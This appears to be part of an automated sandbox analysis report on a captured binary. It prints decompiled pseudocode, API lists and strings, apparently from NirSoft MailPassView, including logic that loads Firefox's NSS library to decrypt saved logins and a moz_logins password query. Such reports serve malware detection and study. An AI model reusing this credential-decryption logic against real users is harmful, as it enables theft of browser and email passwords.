                                                                                • strcpy.MSVCRT(?,00000000,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D019
                                                                                • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D02F
                                                                                • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D045
                                                                                • strcpy.MSVCRT(?,0040D314,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D05B
                                                                                • memset.MSVCRT ref: 0040D076
                                                                                • memset.MSVCRT ref: 0040D08A
                                                                                • memset.MSVCRT ref: 0040D0ED
                                                                                • memset.MSVCRT ref: 0040D101
                                                                                • sprintf.MSVCRT ref: 0040D119
                                                                                • sprintf.MSVCRT ref: 0040D12B
                                                                                • _stricmp.MSVCRT(?,?,?,imap://%s,00000104,?,mailbox://%s,00000104,?,00000000,00000261,?,00000000,00000261,?,?), ref: 0040D13E
                                                                                • _stricmp.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040D158
                                                                                • SetCurrentDirectoryA.KERNEL32(?,?,?,?,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040D1DD
                                                                                Strings
                                                                                • SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 0040CF2B
                                                                                • mailbox://%s, xrefs: 0040D113
                                                                                • imap://%s, xrefs: 0040D125
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$AddressProcstrcpy$CurrentDirectory$ByteCharLibraryLoadMultiWide_stricmpsprintfstrlen$HandleModule
                                                                                • String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins$imap://%s$mailbox://%s
                                                                                • API String ID: 4276617627-3913509535
                                                                                • Opcode ID: 93cdc50bd840dfc44d83282a7c9c7e4a4c6f33fe3d7da29804190475922260c9
                                                                                • Instruction ID: 531ad7aca3640aed267cd003a13377454315b37e4b42da830508d09ae9ff7478
                                                                                • Opcode Fuzzy Hash: 93cdc50bd840dfc44d83282a7c9c7e4a4c6f33fe3d7da29804190475922260c9
                                                                                • Instruction Fuzzy Hash: 58B10A72C00219ABDB20EFA5CC819DEB7BDEF04315F1445BBE619B2191DB38AB858F54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040A774, Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 285windowregistrystringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 76%
                                                                                			E0040A774(intOrPtr __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HMENU__* _t121;
				struct HWND__* _t122;
				intOrPtr _t128;
				int _t133;
				intOrPtr _t135;
				int _t149;
				void* _t166;
				void* _t174;
				void* _t178;
				void* _t185;
				intOrPtr _t194;
				void* _t197;
				void* _t198;
				intOrPtr _t200;
				intOrPtr _t201;
				void* _t202;
				int _t204;
				intOrPtr _t205;
				intOrPtr* _t207;
				intOrPtr* _t208;
				void* _t210;
				intOrPtr* _t211;
				void* _t213;

				_t213 = __eflags;
				_t208 = _t210 - 0x78;
				_t211 = _t210 - 0xb8;
				 *((intOrPtr*)(_t208 + 0x70)) = __ecx;
				 *((char*)(_t208 - 0x37)) = 1;
				 *(_t208 - 0x40) = 0;
				 *((intOrPtr*)(_t208 - 0x3c)) = 0;
				 *((char*)(_t208 - 0x38)) = 0;
				 *((char*)(_t208 - 0x36)) = 0;
				 *((char*)(_t208 - 0x35)) = 0;
				asm("stosd");
				asm("stosd");
				 *(_t208 - 0x2c) = 1;
				 *((intOrPtr*)(_t208 - 0x28)) = 0x9c41;
				 *((char*)(_t208 - 0x24)) = 4;
				 *((char*)(_t208 - 0x23)) = 0;
				 *((char*)(_t208 - 0x22)) = 0;
				 *((char*)(_t208 - 0x21)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 - 0x18)) = 5;
				 *((intOrPtr*)(_t208 - 0x14)) = 0x9c44;
				 *((char*)(_t208 - 0x10)) = 4;
				 *((char*)(_t208 - 0xf)) = 0;
				 *((char*)(_t208 - 0xe)) = 0;
				 *((char*)(_t208 - 0xd)) = 0;
				asm("stosd");
				asm("stosd");
				 *(_t208 - 4) = 2;
				 *_t208 = 0x9c48;
				 *((char*)(_t208 + 4)) = 4;
				 *((char*)(_t208 + 5)) = 0;
				 *((char*)(_t208 + 6)) = 0;
				 *((char*)(_t208 + 7)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x10)) = 3;
				 *((intOrPtr*)(_t208 + 0x14)) = 0x9c49;
				 *((char*)(_t208 + 0x18)) = 4;
				 *((char*)(_t208 + 0x19)) = 0;
				 *((char*)(_t208 + 0x1a)) = 0;
				 *((char*)(_t208 + 0x1b)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x24)) = 0;
				 *((intOrPtr*)(_t208 + 0x28)) = 0x9c4e;
				 *((char*)(_t208 + 0x2c)) = 4;
				 *((char*)(_t208 + 0x2d)) = 0;
				 *((char*)(_t208 + 0x2e)) = 0;
				 *((char*)(_t208 + 0x2f)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x38)) = 6;
				 *((intOrPtr*)(_t208 + 0x3c)) = 0x9c56;
				 *((char*)(_t208 + 0x40)) = 4;
				 *((char*)(_t208 + 0x41)) = 0;
				 *((char*)(_t208 + 0x42)) = 0;
				 *((char*)(_t208 + 0x43)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x4c)) = 4;
				 *((intOrPtr*)(_t208 + 0x50)) = 0x9c42;
				 *((char*)(_t208 + 0x54)) = 4;
				 *((char*)(_t208 + 0x55)) = 0;
				 *((char*)(_t208 + 0x56)) = 0;
				 *((char*)(_t208 + 0x57)) = 0;
				 *(_t208 + 0x6c) =  *(_t208 + 0x6c) | 0xffffffff;
				asm("stosd");
				_t198 = 0x66;
				asm("stosd");
				_t121 = E00407BB9(_t198);
				_t194 =  *((intOrPtr*)(_t208 + 0x70));
				 *(_t194 + 0x11c) = _t121;
				_t122 = SetMenu( *(_t194 + 0x108), _t121);
				__imp__#6(0x50000000, 0x412466,  *(_t194 + 0x108), 0x101, _t185, _t197, _t166);
				 *(_t194 + 0x114) = _t122;
				SendMessageA(_t122, 0x404, 1, _t208 + 0x6c);
				 *((intOrPtr*)(_t194 + 0x118)) = CreateToolbarEx( *(_t194 + 0x108), 0x50010900, 0x102, 7, 0, LoadImageA( *0x416b94, 0x68, 0, 0, 0, 0x9060), _t208 - 0x40, 8, 0x10, 0x10, 0x70, 0x10, 0x14);
				E004023D4( *((intOrPtr*)(_t194 + 0x370)), _t213, CreateWindowExA(0, "SysListView32", 0, 0x50810809, 0, 0, 0x190, 0xc8,  *(_t194 + 0x108), 0x103,  *0x416b94, 0), 1);
				_t128 =  *((intOrPtr*)(_t194 + 0x370));
				_t173 =  *((intOrPtr*)(_t128 + 0x1b0));
				_t200 =  *((intOrPtr*)(_t128 + 0x1b4));
				 *((intOrPtr*)(_t208 + 0x68)) =  *((intOrPtr*)(_t128 + 0x184));
				if(_t173 <= 0) {
					L3:
					_t201 =  *((intOrPtr*)(_t194 + 0x370));
					E00409EC4(_t201);
					_t133 = ImageList_ReplaceIcon( *(_t201 + 0x18c), 0, LoadIconA( *0x416b94, 0x66));
					if( *((intOrPtr*)(_t201 + 0x1b8)) != 0) {
						E00409E32(_t133, _t173, _t194, _t201);
					}
					_t202 = 0x68;
					 *((intOrPtr*)(_t194 + 0x154)) = E00407BB9(_t202);
					_t135 =  *((intOrPtr*)(_t194 + 0x37c));
					if( *((intOrPtr*)(_t135 + 0x30)) <= 0) {
						_t174 = 0x412466;
					} else {
						if( *((intOrPtr*)(_t135 + 0x1c)) <= 0) {
							_t174 = 0;
						} else {
							_t174 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 0xc)))) +  *((intOrPtr*)(_t135 + 0x10));
						}
					}
					_push("/noloadsettings");
					_push(_t174);
					L004115B2();
					if(_t135 == 0) {
						RegDeleteKeyA(0x80000001, "Software\\NirSoft\\MailPassView");
					}
					E0040AF17(_t194, 0);
					 *( *(_t194 + 0x36c)) = 1;
					SetFocus( *( *((intOrPtr*)(_t194 + 0x370)) + 0x184));
					if( *0x417660 == 0) {
						E00406172(0x417660);
						if((GetFileAttributesA(0x417660) & 0x00000001) != 0) {
							GetTempPathA(0x104, 0x417660);
						}
					}
					_t204 = strlen(0x417660);
					 *_t211 = "report.html";
					_t99 = strlen(??) + 1; // 0x1
					_t223 = _t204 + _t99 - 0x104;
					if(_t204 + _t99 >= 0x104) {
						 *((char*)(_t194 + 0x264)) = 0;
					} else {
						E004062AD(_t194 + 0x264, 0x417660, "report.html");
					}
					_push(1);
					_t178 = 0x30;
					E0040A00B( *((intOrPtr*)(_t194 + 0x370)), _t178);
					E0040A00B( *((intOrPtr*)(_t194 + 0x370)), 1, ( *(_t194 + 0x36c))[1]);
					_t149 = RegisterWindowMessageA("commdlg_FindReplace");
					_t205 = _t194;
					 *(_t194 + 0x374) = _t149;
					E0040A27F(0, 1, _t205, _t223);
					E00401E8B(_t223,  *((intOrPtr*)(_t205 + 0x370)) + 0xb20);
					 *(_t208 + 0x60) = 0x12c;
					 *((intOrPtr*)(_t208 + 0x64)) = 0x400;
					SendMessageA( *(_t205 + 0x114), 0x404, 2, _t208 + 0x60);
					return SendMessageA( *(_t205 + 0x114), 0x401, 0x1001, 0);
				} else {
					_t207 = _t200 + 0xc;
					 *((intOrPtr*)(_t208 + 0x74)) = _t173;
					do {
						_t173 =  *((intOrPtr*)(_t207 - 8));
						E00404925( *((intOrPtr*)(_t207 + 4)),  *((intOrPtr*)(_t207 - 8)),  *((intOrPtr*)(_t208 + 0x68)),  *((intOrPtr*)(_t207 - 0xc)),  *((intOrPtr*)(_t207 - 4)),  *_t207);
						_t211 = _t211 + 0x10;
						_t207 = _t207 + 0x14;
						_t82 = _t208 + 0x74;
						 *_t82 =  *((intOrPtr*)(_t208 + 0x74)) - 1;
					} while ( *_t82 != 0);
					goto L3;
				}
			}





























                                                                                0x0040a774
                                                                                0x0040a775
                                                                                0x0040a779
                                                                                0x0040a782
                                                                                0x0040a785
                                                                                0x0040a78d
                                                                                0x0040a790
                                                                                0x0040a793
                                                                                0x0040a796
                                                                                0x0040a799
                                                                                0x0040a79f
                                                                                0x0040a7a0
                                                                                0x0040a7a1
                                                                                0x0040a7a8
                                                                                0x0040a7af
                                                                                0x0040a7b3
                                                                                0x0040a7b6
                                                                                0x0040a7b9
                                                                                0x0040a7c1
                                                                                0x0040a7c2
                                                                                0x0040a7c3
                                                                                0x0040a7ca
                                                                                0x0040a7d1
                                                                                0x0040a7d5
                                                                                0x0040a7d8
                                                                                0x0040a7db
                                                                                0x0040a7e3
                                                                                0x0040a7e4
                                                                                0x0040a7e5
                                                                                0x0040a7ec
                                                                                0x0040a7f3
                                                                                0x0040a7f7
                                                                                0x0040a7fa
                                                                                0x0040a7fd
                                                                                0x0040a805
                                                                                0x0040a806
                                                                                0x0040a807
                                                                                0x0040a80e
                                                                                0x0040a815
                                                                                0x0040a819
                                                                                0x0040a81c
                                                                                0x0040a81f
                                                                                0x0040a827
                                                                                0x0040a828
                                                                                0x0040a829
                                                                                0x0040a82c
                                                                                0x0040a833
                                                                                0x0040a837
                                                                                0x0040a83a
                                                                                0x0040a83d
                                                                                0x0040a845
                                                                                0x0040a846
                                                                                0x0040a847
                                                                                0x0040a84e
                                                                                0x0040a855
                                                                                0x0040a859
                                                                                0x0040a85c
                                                                                0x0040a85f
                                                                                0x0040a867
                                                                                0x0040a868
                                                                                0x0040a869
                                                                                0x0040a870
                                                                                0x0040a877
                                                                                0x0040a87b
                                                                                0x0040a87e
                                                                                0x0040a881
                                                                                0x0040a884
                                                                                0x0040a88d
                                                                                0x0040a890
                                                                                0x0040a891
                                                                                0x0040a892
                                                                                0x0040a897
                                                                                0x0040a8a1
                                                                                0x0040a8a7
                                                                                0x0040a8c2
                                                                                0x0040a8d4
                                                                                0x0040a8da
                                                                                0x0040a927
                                                                                0x0040a95f
                                                                                0x0040a964
                                                                                0x0040a96a
                                                                                0x0040a972
                                                                                0x0040a97e
                                                                                0x0040a981
                                                                                0x0040a9aa
                                                                                0x0040a9aa
                                                                                0x0040a9b2
                                                                                0x0040a9cd
                                                                                0x0040a9d9
                                                                                0x0040a9db
                                                                                0x0040a9db
                                                                                0x0040a9e2
                                                                                0x0040a9e8
                                                                                0x0040a9ee
                                                                                0x0040a9f7
                                                                                0x0040aa0c
                                                                                0x0040a9f9
                                                                                0x0040a9fc
                                                                                0x0040aa08
                                                                                0x0040a9fe
                                                                                0x0040aa03
                                                                                0x0040aa03
                                                                                0x0040a9fc
                                                                                0x0040aa11
                                                                                0x0040aa16
                                                                                0x0040aa17
                                                                                0x0040aa20
                                                                                0x0040aa2c
                                                                                0x0040aa2c
                                                                                0x0040aa35
                                                                                0x0040aa40
                                                                                0x0040aa52
                                                                                0x0040aa63
                                                                                0x0040aa65
                                                                                0x0040aa73
                                                                                0x0040aa7b
                                                                                0x0040aa7b
                                                                                0x0040aa73
                                                                                0x0040aa87
                                                                                0x0040aa89
                                                                                0x0040aa95
                                                                                0x0040aa99
                                                                                0x0040aa9f
                                                                                0x0040aaba
                                                                                0x0040aaa1
                                                                                0x0040aab1
                                                                                0x0040aab7
                                                                                0x0040aac6
                                                                                0x0040aaca
                                                                                0x0040aacb
                                                                                0x0040aae2
                                                                                0x0040aaec
                                                                                0x0040aaf4
                                                                                0x0040aaf6
                                                                                0x0040aafc
                                                                                0x0040ab0d
                                                                                0x0040ab29
                                                                                0x0040ab30
                                                                                0x0040ab37
                                                                                0x0040ab53
                                                                                0x0040a983
                                                                                0x0040a983
                                                                                0x0040a986
                                                                                0x0040a989
                                                                                0x0040a991
                                                                                0x0040a99a
                                                                                0x0040a99f
                                                                                0x0040a9a2
                                                                                0x0040a9a5
                                                                                0x0040a9a5
                                                                                0x0040a9a5
                                                                                0x00000000
                                                                                0x0040a989

                                                                                APIs
                                                                                  • Part of subcall function 00407BB9: LoadMenuA.USER32 ref: 00407BC1
                                                                                  • Part of subcall function 00407BB9: sprintf.MSVCRT ref: 00407BE4
                                                                                • SetMenu.USER32(?,00000000), ref: 0040A8A7
                                                                                • #6.COMCTL32(50000000,Function_00012466,?,00000101), ref: 0040A8C2
                                                                                • SendMessageA.USER32 ref: 0040A8DA
                                                                                • LoadImageA.USER32 ref: 0040A8F0
                                                                                • CreateToolbarEx.COMCTL32(?,50010900,00000102,00000007,00000000,00000000,?,00000008,00000010,00000010,00000070,00000010,00000014), ref: 0040A91A
                                                                                • CreateWindowExA.USER32 ref: 0040A950
                                                                                • LoadIconA.USER32(00000066,00000000), ref: 0040A9BF
                                                                                • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 0040A9CD
                                                                                • _stricmp.MSVCRT(Function_00012466,/noloadsettings), ref: 0040AA17
                                                                                • RegDeleteKeyA.ADVAPI32(80000001,Software\NirSoft\MailPassView), ref: 0040AA2C
                                                                                • SetFocus.USER32(?,00000000), ref: 0040AA52
                                                                                • GetFileAttributesA.KERNEL32(00417660), ref: 0040AA6B
                                                                                • GetTempPathA.KERNEL32(00000104,00417660), ref: 0040AA7B
                                                                                • strlen.MSVCRT ref: 0040AA82
                                                                                • strlen.MSVCRT ref: 0040AA90
                                                                                • RegisterWindowMessageA.USER32(commdlg_FindReplace,?,00000001), ref: 0040AAEC
                                                                                  • Part of subcall function 00404925: strlen.MSVCRT ref: 00404942
                                                                                  • Part of subcall function 00404925: SendMessageA.USER32 ref: 00404966
                                                                                • SendMessageA.USER32 ref: 0040AB37
                                                                                • SendMessageA.USER32 ref: 0040AB4A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$Send$Loadstrlen$CreateIconImageMenuWindow$AttributesDeleteFileFocusList_PathRegisterReplaceTempToolbar_stricmpsprintf
                                                                                • String ID: /noloadsettings$Software\NirSoft\MailPassView$SysListView32$`vA$commdlg_FindReplace$report.html
                                                                                • API String ID: 873469642-860065374
                                                                                • Opcode ID: a4e7fbf76496b0a5143eb8d44d5c426d23ad41d46f34e9c279854c8240868147
                                                                                • Instruction ID: ca2bded9840d9beafebaacef77bacb5142d556b3fd29cdc4ce09694084a06bb6
                                                                                • Opcode Fuzzy Hash: a4e7fbf76496b0a5143eb8d44d5c426d23ad41d46f34e9c279854c8240868147
                                                                                • Instruction Fuzzy Hash: 82B12271644388FFEB16CF74CC45BDABBA5BF14304F00406AFA44A7292C7B5A954CB5A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040DB39, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 220windowstringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 88%
                                                                                			E0040DB39(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, void _a10, unsigned int _a12, void _a264, void _a265, void _a520, void _a521, void _a776, void _a780, char _a784, char _a1056, void _a1057, char _a2080, void _a2081, char _a3104, void _a3105) {
				char _v0;
				struct HWND__* _v4;
				void* __edi;
				void* _t44;
				void* _t58;
				int _t59;
				int _t61;
				int _t62;
				long _t66;
				struct HWND__* _t93;
				intOrPtr _t122;
				unsigned int _t125;
				signed int _t127;
				signed int _t128;
				void* _t134;

				_t128 = _t127 & 0xfffffff8;
				E004118A0(0x1424, __ecx);
				_t44 = _a8 - 0x110;
				if(_t44 == 0) {
					E00406491(__edx, _a4);
					 *_t128 = 0x7ff;
					_a3104 = 0;
					memset( &_a3105, 0, ??);
					asm("movsd");
					asm("movsd");
					asm("movsw");
					memset( &_a10, 0, 0xfb);
					_a520 = 0;
					memset( &_a521, 0, 0xff);
					_a264 = 0;
					memset( &_a265, 0, 0xff);
					_a1056 = 0;
					memset( &_a1057, 0, 0x3ff);
					_a2080 = 0;
					memset( &_a2081, 0, 0x3ff);
					_t134 = _t128 + 0x48;
					_t58 = GetCurrentProcess();
					_t102 =  &_a520;
					_v4 = _t58;
					_t59 = ReadProcessMemory(_t58,  *0x416c64,  &_a520, 0x80, 0);
					__eflags = _t59;
					if(_t59 != 0) {
						E00406585( &_a1056,  &_a520, 4);
						_pop(_t102);
					}
					_t61 = ReadProcessMemory(_v4,  *0x416c58,  &_a264, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00406585( &_a2080,  &_a264, 0);
						_pop(_t102);
					}
					_t62 = E0040629C();
					__eflags = _t62;
					if(_t62 == 0) {
						E0040E056();
					} else {
						E0040E0DA();
					}
					__eflags =  *0x417514;
					if(__eflags != 0) {
						L17:
						_a776 = 0;
						memset( &_a780, 0, 0x114);
						_t122 =  *0x416e7c; // 0x0
						_t134 = _t134 + 0xc;
						_t66 = GetCurrentProcessId();
						 *0x417108 = 0;
						E0040E255(_t102, __eflags, _t66, _t122);
						__eflags =  *0x417108;
						if( *0x417108 != 0) {
							memcpy( &_a776, 0x416ff0, 0x118);
							_t134 = _t134 + 0xc;
							__eflags =  *0x417108;
							if( *0x417108 != 0) {
								strcpy( &_v0, E004061E6( &_a784));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x417518;
						if(__eflags == 0) {
							L20:
							sprintf( &_a3104, "Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n",  *0x416e70,  *0x416e7c,  &_v0,  *0x416c50,  *0x416c44,  *0x416c4c,  *0x416c48,  *0x416c40,  *0x416c3c,  *0x416c54,  *0x416c64,  *0x416c58,  &_a1056,  &_a2080);
							SetDlgItemTextA(_a4, 0x3ea,  &_a3104);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t44 == 1) {
					_t125 = _a12;
					if(_t125 >> 0x10 == 0) {
						if(_t125 == 3) {
							_t93 = GetDlgItem(_a4, 0x3ea);
							_v4 = _t93;
							SendMessageA(_t93, 0xb1, 0, 0xffff);
							SendMessageA(_v4, 0x301, 0, 0);
							SendMessageA(_v4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}


















                                                                                0x0040db3c
                                                                                0x0040db44
                                                                                0x0040db4c
                                                                                0x0040db54
                                                                                0x0040dbd8
                                                                                0x0040dbdf
                                                                                0x0040dbef
                                                                                0x0040dbf6
                                                                                0x0040dc04
                                                                                0x0040dc08
                                                                                0x0040dc14
                                                                                0x0040dc16
                                                                                0x0040dc2d
                                                                                0x0040dc34
                                                                                0x0040dc46
                                                                                0x0040dc4d
                                                                                0x0040dc64
                                                                                0x0040dc6b
                                                                                0x0040dc7d
                                                                                0x0040dc84
                                                                                0x0040dc89
                                                                                0x0040dc8c
                                                                                0x0040dc9e
                                                                                0x0040dcac
                                                                                0x0040dcb1
                                                                                0x0040dcb3
                                                                                0x0040dcb5
                                                                                0x0040dcc8
                                                                                0x0040dcce
                                                                                0x0040dcce
                                                                                0x0040dce7
                                                                                0x0040dce9
                                                                                0x0040dceb
                                                                                0x0040dcfd
                                                                                0x0040dd03
                                                                                0x0040dd03
                                                                                0x0040dd04
                                                                                0x0040dd09
                                                                                0x0040dd0b
                                                                                0x0040dd14
                                                                                0x0040dd0d
                                                                                0x0040dd0d
                                                                                0x0040dd0d
                                                                                0x0040dd19
                                                                                0x0040dd1f
                                                                                0x0040dd29
                                                                                0x0040dd37
                                                                                0x0040dd3e
                                                                                0x0040dd43
                                                                                0x0040dd49
                                                                                0x0040dd4c
                                                                                0x0040dd54
                                                                                0x0040dd5a
                                                                                0x0040dd5f
                                                                                0x0040dd67
                                                                                0x0040dd7b
                                                                                0x0040dd80
                                                                                0x0040dd83
                                                                                0x0040dd89
                                                                                0x0040dd9d
                                                                                0x0040dda3
                                                                                0x0040dd89
                                                                                0x00000000
                                                                                0x0040dd21
                                                                                0x0040dd21
                                                                                0x0040dd27
                                                                                0x0040dda4
                                                                                0x0040de08
                                                                                0x0040de21
                                                                                0x0040de32
                                                                                0x0040de38
                                                                                0x0040de40
                                                                                0x0040de40
                                                                                0x00000000
                                                                                0x0040dd27
                                                                                0x0040dd1f
                                                                                0x0040db57
                                                                                0x0040db5d
                                                                                0x0040db68
                                                                                0x0040db8b
                                                                                0x0040db99
                                                                                0x0040dbb4
                                                                                0x0040dbb8
                                                                                0x0040dbc5
                                                                                0x0040dbce
                                                                                0x0040dbce
                                                                                0x0040db8b
                                                                                0x0040db68
                                                                                0x00000000

                                                                                APIs
                                                                                Strings
                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040DE02
                                                                                • {Unknown}, xrefs: 0040DBFB
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusTextmemcpysprintfstrcpy
                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                • API String ID: 138940113-3474136107
                                                                                • Opcode ID: a83a35a4c36da605d140adb83b4774888d9d4a076b757738f8a3eb1b01500df5
                                                                                • Instruction ID: 36e6f19d437acde9dae1843bd1f228cb1d7049f577ea92cd8b51c55dddb48a69
                                                                                • Opcode Fuzzy Hash: a83a35a4c36da605d140adb83b4774888d9d4a076b757738f8a3eb1b01500df5
                                                                                • Instruction Fuzzy Hash: 6D711C72844244BFD721EF51DC41EEB3BEDEF94344F00843EF649921A0DA399A58CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040DEEE, Relevance: 42.1, APIs: 16, Strings: 8, Instructions: 113libraryloaderstringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040DEEE(struct HINSTANCE__** __esi, intOrPtr _a4) {
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void* __ebx;
				void* __edi;
				int _t39;
				void* _t44;
				struct HINSTANCE__* _t53;
				struct HINSTANCE__* _t56;
				struct HINSTANCE__** _t69;

				_t69 = __esi;
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				if(_a4 != 0) {
					E004060D0(0x104,  &_v268, _a4);
				}
				if(_v268 != 0) {
					GetCurrentDirectoryA(0x104,  &(_t69[8]));
					SetCurrentDirectoryA( &_v268);
					_v532 = 0;
					memset( &_v531, 0, 0x104);
					_t39 = strlen("nss3.dll");
					_t13 = strlen( &_v268) + 1; // 0x1
					if(_t39 + _t13 >= 0x104) {
						_v532 = 0;
					} else {
						E004062AD( &_v532,  &_v268, "nss3.dll");
					}
					_t44 = GetModuleHandleA( &_v532);
					 *_t69 = _t44;
					if(_t44 != 0) {
						L9:
						_t69[1] = GetProcAddress( *_t69, "NSS_Init");
						_t69[2] = GetProcAddress( *_t69, "NSS_Shutdown");
						_t69[3] = GetProcAddress( *_t69, "PK11_GetInternalKeySlot");
						_t69[4] = GetProcAddress( *_t69, "PK11_FreeSlot");
						_t69[5] = GetProcAddress( *_t69, "PK11_CheckUserPassword");
						_t69[6] = GetProcAddress( *_t69, "PK11_Authenticate");
						_t69[7] = GetProcAddress( *_t69, "PK11SDR_Decrypt");
					} else {
						_t53 = LoadLibraryExA( &_v532, _t44, 8);
						 *_t69 = _t53;
						if(_t53 != 0) {
							goto L9;
						} else {
							E0040DEA9();
							_t56 = LoadLibraryExA( &_v532, 0, 8);
							 *_t69 = _t56;
							if(_t56 != 0) {
								goto L9;
							}
						}
					}
				}
				return 0 |  *_t69 != 0x00000000;
			}














                                                                                0x0040deee
                                                                                0x0040df08
                                                                                0x0040df0f
                                                                                0x0040df1b
                                                                                0x0040df26
                                                                                0x0040df2b
                                                                                0x0040df33
                                                                                0x0040df3e
                                                                                0x0040df4b
                                                                                0x0040df5b
                                                                                0x0040df62
                                                                                0x0040df6c
                                                                                0x0040df7f
                                                                                0x0040df88
                                                                                0x0040dfa5
                                                                                0x0040df8a
                                                                                0x0040df9c
                                                                                0x0040dfa2
                                                                                0x0040dfb3
                                                                                0x0040dfbb
                                                                                0x0040dfbd
                                                                                0x0040dfef
                                                                                0x0040e005
                                                                                0x0040e011
                                                                                0x0040e01d
                                                                                0x0040e029
                                                                                0x0040e035
                                                                                0x0040e041
                                                                                0x0040e046
                                                                                0x0040dfbf
                                                                                0x0040dfcf
                                                                                0x0040dfd3
                                                                                0x0040dfd5
                                                                                0x00000000
                                                                                0x0040dfd7
                                                                                0x0040dfd7
                                                                                0x0040dfe7
                                                                                0x0040dfeb
                                                                                0x0040dfed
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040dfed
                                                                                0x0040dfd5
                                                                                0x0040dfbd
                                                                                0x0040e053

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040DF0F
                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040DF3E
                                                                                • SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040DF4B
                                                                                • memset.MSVCRT ref: 0040DF62
                                                                                • strlen.MSVCRT ref: 0040DF6C
                                                                                • strlen.MSVCRT ref: 0040DF7A
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040DFB3
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFCF
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFE7
                                                                                • GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040DFFC
                                                                                • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E008
                                                                                • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E014
                                                                                • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E020
                                                                                • GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E02C
                                                                                • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E038
                                                                                • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 0040E044
                                                                                  • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
